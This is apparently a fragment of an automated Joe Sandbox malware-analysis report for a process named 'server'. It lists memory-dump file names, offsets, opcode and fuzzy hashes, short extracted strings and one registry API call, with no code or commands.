              • Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_9a0000_server.jbxd
              Similarity
              • API ID: Close
              • String ID:
              • API String ID: 3535843008-0
              • Opcode ID: 8f92a67900656fdd3f0c7e76949a394eb8a988f9a078c41a1d1ea6d300cbff75
              • Instruction ID: 4c1ea410ed36b56c85399358ee09be85c8db5de6038d75248b4e3cfbcdff5374
              • Opcode Fuzzy Hash: 8f92a67900656fdd3f0c7e76949a394eb8a988f9a078c41a1d1ea6d300cbff75
              • Instruction Fuzzy Hash: 8EB012D0902148FADF02D7FC5C0D7B7694C5B82303F04829CB315F11B4CB284541E728
              APIs
              Memory Dump Source
              • Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_9a0000_server.jbxd
              Similarity
              • API ID: Close
              • String ID:
              • API String ID: 3535843008-0
              • Opcode ID: a2294106ef934395d0e69d0ed070ad56b347653f635cdc4f58b54072da5dd0a9
              • Instruction ID: 36cbff09100bcc84b42530c55d1537d16331d24b75f9d35035549740422cbdee
              • Opcode Fuzzy Hash: a2294106ef934395d0e69d0ed070ad56b347653f635cdc4f58b54072da5dd0a9
              • Instruction Fuzzy Hash:
              Memory Dump Source
              • Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_9a0000_server.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a6832c81c088d78ab6a53aad4f1ce51fa42083bffe9224b29cf5843cc9865d8c
              • Instruction ID: 891e6c03cd72cdbf8059a2b13c1feb73d2d2127aaf5cc3db6b8e318b40199045
              • Opcode Fuzzy Hash: a6832c81c088d78ab6a53aad4f1ce51fa42083bffe9224b29cf5843cc9865d8c
              • Instruction Fuzzy Hash: DAF05B75D00A0CEBCF11DBA4D9C4EDDBBB9EB08320F2042D6B958A3241DB355F909751
              Memory Dump Source
              • Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_9a0000_server.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 6d5e29c895c9b39b0505d43aa546ea0c1db5dd1fd8ff9ca85ae55adecdc21f20
              • Instruction ID: 259e5a7a1869e86b175ad3d31d420e270e45394ff4cfb6594977f247ef768f47
              • Opcode Fuzzy Hash: 6d5e29c895c9b39b0505d43aa546ea0c1db5dd1fd8ff9ca85ae55adecdc21f20
              • Instruction Fuzzy Hash: E9D0C9B350024D6F8B01EEFCDD41EDB33ECAA08610B008926BE15D7141EF78E5249BB5
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_2fd0000_server.jbxd
              Similarity
              • API ID:
              • String ID: :@%l$:@%l
              • API String ID: 0-3783435328
              • Opcode ID: 4c252899e0a409fbe8f852137c1f51729ba5cdc68b17dd4edbdca54eb8758c29
              • Instruction ID: f171e50d5e4ceb477e18bdf3a4c415ffd9b6cb9afe077a124c0fe9ad2b381290
              • Opcode Fuzzy Hash: 4c252899e0a409fbe8f852137c1f51729ba5cdc68b17dd4edbdca54eb8758c29
              • Instruction Fuzzy Hash: 7CB25EB4B00365DBEF158B34E8207AD77BBEB48748F0491969845937A0CF389E96DF21
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_2fd0000_server.jbxd
              Similarity
              • API ID:
              • String ID: :@%l$:@%l
              • API String ID: 0-3783435328
              • Opcode ID: 6bff4a11a219be59716c876b871ad5d4264e710f3133b59dfd224316e4bbedae
              • Instruction ID: 851c7d391b1824daa1c85fce46149fe1d0d33f96fc1bbc89f4622f3fbeccff1c
              • Opcode Fuzzy Hash: 6bff4a11a219be59716c876b871ad5d4264e710f3133b59dfd224316e4bbedae
              • Instruction Fuzzy Hash: 0D926DF4B003649BEF154B74D8207BD7BABEB88788F0491669445937A0CF389E96DF21
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_2fd0000_server.jbxd
              Similarity
              • API ID:
              • String ID: :@%l$:@%l
              • API String ID: 0-3783435328
              • Opcode ID: a876610c44236179d87ee10302fcbfe785e443faba0e7d1c89c804ad14c40bbb
              • Instruction ID: 4a34e54dbffffe5502a0c919ea4cd0710be7695b541949c03189b45996d121ad
              • Opcode Fuzzy Hash: a876610c44236179d87ee10302fcbfe785e443faba0e7d1c89c804ad14c40bbb
              • Instruction Fuzzy Hash: D0927DF4B003649BEF154B74D8207BD7BABEB88788F0491669445937A0CF389E96DF21
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_2fd0000_server.jbxd
              Similarity
              • API ID:
              • String ID: :@%l$:@%l
              • API String ID: 0-3783435328
              • Opcode ID: 6a8a0f4723507841b03079927153de0deae5691960fdac6bcab37f31216a9c55
              • Instruction ID: de4f16b650f9ff8fcad2a63bf3870aceb161d9acdeac65d602f91b2d85ac5b04
              • Opcode Fuzzy Hash: 6a8a0f4723507841b03079927153de0deae5691960fdac6bcab37f31216a9c55
              • Instruction Fuzzy Hash: 9F927DF4B003649BEF154B74D8207BD7BABEB88788F0491669445937A0CF389E96DF21
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_2fd0000_server.jbxd
              Similarity
              • API ID:
              • String ID: :@%l$\OLl
              • API String ID: 0-1085053772
              • Opcode ID: 72d85033d5a18c36d9e01351280a214c0600235deaabcb54f70b6733ac7335a2
              • Instruction ID: d106860791a64beba76520cf8fd2125d17c2bddaa94809ae1fdf01567b744f9f
              • Opcode Fuzzy Hash: 72d85033d5a18c36d9e01351280a214c0600235deaabcb54f70b6733ac7335a2
              • Instruction Fuzzy Hash: 20B2F474A412288FDB25DF20D864BADB7B6FB49308F1041EAD909A77A0DF359E84CF51
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_2fd0000_server.jbxd
              Similarity
              • API ID:
              • String ID: :@%l$\OLl
              • API String ID: 0-1085053772
              • Opcode ID: ac8620e26655d525aedafaecf395cd3f994a8b02bce1bbc66be2331ba6b4d4f2
              • Instruction ID: 7006c63e31095469011d3833ea1e3cdd214cb7c5bdb344121deb850706afc506
              • Opcode Fuzzy Hash: ac8620e26655d525aedafaecf395cd3f994a8b02bce1bbc66be2331ba6b4d4f2
              • Instruction Fuzzy Hash: 01A2F474A412288FDB25DF20D864BADB7B6FB49308F1041EAD909A73A0DF359E85CF51
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_2fd0000_server.jbxd
              Similarity
              • API ID:
              • String ID: :@%l$\OLl
              • API String ID: 0-1085053772
              • Opcode ID: ddebed65cb8f2391aadbd1caf779af95ed44f0dd9c91850a5dad5042ed2795fb
              • Instruction ID: 6dc986900a2581bc2c7915accc2c90615a01a56345b0e2800d6e5dddcecde0d1
              • Opcode Fuzzy Hash: ddebed65cb8f2391aadbd1caf779af95ed44f0dd9c91850a5dad5042ed2795fb
              • Instruction Fuzzy Hash: C392E474A412288FDB25DF20D864BADB7B6FB49308F1041EAD909A73A0DF359E85CF51
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_2fd0000_server.jbxd
              Similarity
              • API ID:
              • String ID: :@%l$\OLl
              • API String ID: 0-1085053772
              • Opcode ID: 21a15c326b87e7046a918c07c792b05cb3031000830b17024b95b28d1cc83e6d
              • Instruction ID: 7e8397f7c181ca27ca988417ba9d32596c5a5ebfecb4a0d6a20b475130aaf952
              • Opcode Fuzzy Hash: 21a15c326b87e7046a918c07c792b05cb3031000830b17024b95b28d1cc83e6d
              • Instruction Fuzzy Hash: 8092E574A412288FDB25DF20D864BADB7B6FB49308F1041EAD909A73A0DF359E85CF51
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_2fd0000_server.jbxd
              Similarity
              • API ID:
              • String ID: :@%l$\OLl
              • API String ID: 0-1085053772
              • Opcode ID: 0a6968d1f45d222ae8aca6dce499875a2d8c2823d9a10e0975ee8afcb26659ec
              • Instruction ID: 2924780ebe42ae27a3352d9295eb4ae023a94fc242ed88a4e59540d220890793
              • Opcode Fuzzy Hash: 0a6968d1f45d222ae8aca6dce499875a2d8c2823d9a10e0975ee8afcb26659ec
              • Instruction Fuzzy Hash: 6582D774A41228CFDB25DF20D864BA9B7B6FB49308F1041EAD909A73A0DF359E85CF51
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_2fd0000_server.jbxd
              Similarity
              • API ID:
              • String ID: :@%l$\OLl
              • API String ID: 0-1085053772
              • Opcode ID: da5b4a415f37c09e0c3fe6d78b51cebe07c7169b2e84821e468755bdeaa9cace
              • Instruction ID: 65fdbbfb7c638392fffd372ef47d9a9038cd175bb38333919638dc78d65fb1b2
              • Opcode Fuzzy Hash: da5b4a415f37c09e0c3fe6d78b51cebe07c7169b2e84821e468755bdeaa9cace
              • Instruction Fuzzy Hash: 4F72F974A01228CFDB25DF24D864BA9B7BAFB49308F1041EAD509A73A0DF359E85CF51
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_2fd0000_server.jbxd
              Similarity
              • API ID:
              • String ID: :@%l$\OLl
              • API String ID: 0-1085053772
              • Opcode ID: 79f0a2215ed9f4927abc49a88116053adbabdcf7d8d492b456e0b6a860ec8a6f
              • Instruction ID: cf833df186412fd51220ba88f6f6212194ee3e791150d6ee8f06c33c42e835cc
              • Opcode Fuzzy Hash: 79f0a2215ed9f4927abc49a88116053adbabdcf7d8d492b456e0b6a860ec8a6f
              • Instruction Fuzzy Hash: BA62EB74A01228CFDB25DF24D864BADB7BAFB49308F1041EAD509A73A0DB359E85CF51
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_2fd0000_server.jbxd
              Similarity
              • API ID:
              • String ID: :@%l$\OLl
              • API String ID: 0-1085053772
              • Opcode ID: ee5739c6f9c4446545c39fc52f28a99e48d29642c731047f5aa2629b22de2e92
              • Instruction ID: 76770037fc8144547c3acc3b2744b09ac8dbbafcbb7b2c1206ffaa92b5fe202f
              • Opcode Fuzzy Hash: ee5739c6f9c4446545c39fc52f28a99e48d29642c731047f5aa2629b22de2e92
              • Instruction Fuzzy Hash: 3952EB74A01228CFDB25DF24D864BADB7BAFB49308F1041EAD509A73A0DB359E85CF51
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_2fd0000_server.jbxd
              Similarity
              • API ID:
              • String ID: :@%l$\OLl
              • API String ID: 0-1085053772
              • Opcode ID: 049d9d3f122c18a0f0f1d0fd57133217bbd093d21e104f78aec350a9053154a2
              • Instruction ID: 76bc23eea72f414b17b8e2f4ae6f5db0aecb1dd6693643dd7e865295bc486512
              • Opcode Fuzzy Hash: 049d9d3f122c18a0f0f1d0fd57133217bbd093d21e104f78aec350a9053154a2
              • Instruction Fuzzy Hash: 5242FB74A01228CFDB25DF24D864BADB7B6FB49308F1041EAD909A73A0DB359E85CF41
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_2fd0000_server.jbxd
              Similarity
              • API ID:
              • String ID: \OLl$2Ll
              • API String ID: 0-1463305755
              • Opcode ID: 2243b4992fe23d3905a9eee49fcef84631b7c7f0a8e9284501c8bfee574968f5
              • Instruction ID: 304199216208f1bebf7363c68ce658c9685794726049202f106c41b3c4da289f
              • Opcode Fuzzy Hash: 2243b4992fe23d3905a9eee49fcef84631b7c7f0a8e9284501c8bfee574968f5
              • Instruction Fuzzy Hash: 6B323531A00218CFDB24DF74D865BEDB7B2EB49308F1045AAD509AB3A4DB399E85CF51
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_2fd0000_server.jbxd
              Similarity
              • API ID:
              • String ID: :@%l$\OLl
              • API String ID: 0-1085053772
              • Opcode ID: 393722bde4460d555d8f30cf4615fbc337a4b625e366f3a71bac5412790cba62
              • Instruction ID: 24300c7e2d29dac016822a36760a4f6c249bc20512d7e043856dfd20093cd16f
              • Opcode Fuzzy Hash: 393722bde4460d555d8f30cf4615fbc337a4b625e366f3a71bac5412790cba62
              • Instruction Fuzzy Hash: D032D974A01228CFDB25DF34D964BA9B7BAFB49304F1041EAD909A73A0DB359E85CF11
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_2fd0000_server.jbxd
              Similarity
              • API ID:
              • String ID: :@%l$\OLl
              • API String ID: 0-1085053772
              • Opcode ID: 6a5142a53c9a9fdfb95dbb0705db328bcb0cc47447f08b17b9b561cbefbfc298
              • Instruction ID: 23079ee676974d04e439114bff8988b4c031cd6259dddcad8544025807504286
              • Opcode Fuzzy Hash: 6a5142a53c9a9fdfb95dbb0705db328bcb0cc47447f08b17b9b561cbefbfc298
              • Instruction Fuzzy Hash: 0022EB74A01328CFDB25DF24D964BA9B7BAFB49304F1041EAD909A73A0DB359E85CF11
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_2fd0000_server.jbxd
              Similarity
              • API ID:
              • String ID: :@%l$\OLl
              • API String ID: 0-1085053772
              • Opcode ID: 6197b7497a655d4bb1ffe722af81ec0b203168082d2febf330a6ed3f229285c7
              • Instruction ID: c56d49370f60179829d322d68eb9b4423b06dd01ca80018b450a27f163d90b38
              • Opcode Fuzzy Hash: 6197b7497a655d4bb1ffe722af81ec0b203168082d2febf330a6ed3f229285c7
              • Instruction Fuzzy Hash: 11020874A01228CFDB25DF34D864BA9B7B6FB49308F1041EAD909A73A0DB359E85CF11
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_2fd0000_server.jbxd
              Similarity
              • API ID:
              • String ID: :@%l$\OLl
              • API String ID: 0-1085053772
              • Opcode ID: 8220c1ec423af57748831de8e0f01a41c695cbde663c26e8dd554d20d20f9d81
              • Instruction ID: a71db924f4d21e50c8bf08c553d794f17a6f9aae8cbfba530d24dd9f7838a249
              • Opcode Fuzzy Hash: 8220c1ec423af57748831de8e0f01a41c695cbde663c26e8dd554d20d20f9d81
              • Instruction Fuzzy Hash: 66D1F774A012288FDB25DF34D864BADB7B6FB49308F1041EAD509A73A0DB359E85CF51
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_2fd0000_server.jbxd
              Similarity
              • API ID:
              • String ID: :@%l$\OLl
              • API String ID: 0-1085053772
              • Opcode ID: c19df0ac1388925e53ba2e8a20f5dee437aa41de55dc0d63b46387feecc97e90
              • Instruction ID: f6ebaa90ed80f9ce8a1e25c1500569cbd2c0c25727b25c05678dd761644c1694
              • Opcode Fuzzy Hash: c19df0ac1388925e53ba2e8a20f5dee437aa41de55dc0d63b46387feecc97e90
              • Instruction Fuzzy Hash: 5AB13A70A412288FDB25DB34D860BADB7B6FF49308F5041EAD509AB3A0DB359E85CF51
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_2fd0000_server.jbxd
              Similarity
              • API ID:
              • String ID: 2Ll$2Ll
              • API String ID: 0-1498689491
              • Opcode ID: f6e26140649cd9bd1987078e06d80a30e80bcdf89ba8cefc436791bae41b186b
              • Instruction ID: e3d5f55ecff68102f09632ce3054a9b34a0d3e21f3d98dc4b07686af9446580c
              • Opcode Fuzzy Hash: f6e26140649cd9bd1987078e06d80a30e80bcdf89ba8cefc436791bae41b186b
              • Instruction Fuzzy Hash: 49016135B053405BC714E77A9821FBE679B9BD3319744492ED0068BB95CFB98C0A87F2
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_2fd0000_server.jbxd
              Similarity
              • API ID:
              • String ID: 2Ll$2Ll
              • API String ID: 0-1498689491
              • Opcode ID: 711cedc776628df2ce1e027669a8d1530d0a4665bedf97c10a7e8690207ad489
              • Instruction ID: f734514dcd0cdf7cb4a96a28a580a12c86da65c22c5411709a4e55c7a2498211
              • Opcode Fuzzy Hash: 711cedc776628df2ce1e027669a8d1530d0a4665bedf97c10a7e8690207ad489
              • Instruction Fuzzy Hash: EB015235B013005BC714EB7A9811FBE639B9BD3359744442EE0058BB54CFB59C0987F6
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_2fd0000_server.jbxd
              Similarity
              • API ID:
              • String ID: L.Ll
              • API String ID: 0-3667754505
              • Opcode ID: 9373f423d88916995d81bbaf5687a667be7350072067918337ef3af6e8813c4e
              • Instruction ID: 64941e8add53848bb5e8342194a79bbdac3352d18780e286bec1b8cb1ea9f6b0
              • Opcode Fuzzy Hash: 9373f423d88916995d81bbaf5687a667be7350072067918337ef3af6e8813c4e
              • Instruction Fuzzy Hash: 39F19B31B003058FDB14EB75C950BAEB7E6AF88398F188529D515DB3A1EF38D846CB61
              APIs
              • RegOpenKeyExW.KERNELBASE(?,00000E90), ref: 00D9B1F5
              Memory Dump Source
